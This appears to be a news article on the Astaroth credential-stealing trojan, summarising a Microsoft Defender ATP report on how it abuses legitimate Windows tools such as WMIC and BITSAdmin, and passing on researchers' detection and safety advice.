What is the “Great Duke of Hell” Malware?

Researchers with the Microsoft Defender Advanced Threat Protection Research Team have warned Windows users about the very real threat of a credential-stealing malware known as the “Duke of Hell.” The reason that the malware is so dangerous is because it is able to hide in plain sight like an invisible man by only running files within the attack chain that are completely legitimate system tools. The computer doesn’t know anything is wrong.

The trojan is called the Astaroth Trojan – named after the biblical “Great Duke of Hell”. The virus includes clipboard monitoring and keylogging to steal login information. The malware has become infamous because of how it exploits “living of the land binaries” (LOLbins) to do this. In the newly-published report from Microsoft the Windows Management Instrumentation Command-Line (WMIC) that was being exploited.

Andrea Lelli, who is part of the Microsoft Defender ATP Research Team and who authored the report, said that victims would still need to click on malicious links to trigger the attack chain through a file running an obfuscated batch file. This batch file will trigger the legitimate WMIC system tool to trigger an obfuscated JavaScript file.

This is where it gets a bit complicated with more obfuscated JavaScript code and more legitimate system tools. The most important part of the attack chain is the Background Intelligent Transfer Services (BITS) admin service that is used to download more payloads of the virus. These file-less attacks, as they are called, process the malicious payloads “directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk,” Lelli explains.

Eli Salem, a security researcher with Cybereason who uncovered a previous Astaroth attack, said the attacks are difficult to detect as “the full process of the deployment and execution of the malware” is done through Windows LOLBins. The attacks seem like perfectly legitimate Windows activity to the average user because they are being done by legitimate Windows processes.

However, Lelli explained that “using invisible techniques and being actually invisible are two different things.” Given that some of the techniques are so anomalous, Microsoft Defender ATP, the commercial version of the Microsoft Defender Antivirus loaded into Windows 10 free of charge, is able to identify Astaroth attacks.

If you aren’t using Windows Defender ATP, then Salem advises that Windows users take care when “opening anonymous or new .lnk and .zip files that come from suspicious email attachments.” Another warning comes from Kevin Reed, CISO of Acronis. Reed says that the fileless malware is an efficient technique that passes by many current anti-malware products without being detected. He says that users should “choose a solution that employs advanced malware detection techniques such as memory scanning, stack trace analysis, and system cell-based directions.” These techniques will expose any malware hiding in the PC memory.

This is not the first time that the Astaroth malware has hit and doubtless it will be the last. As long as you stay careful out there though, you should be okay.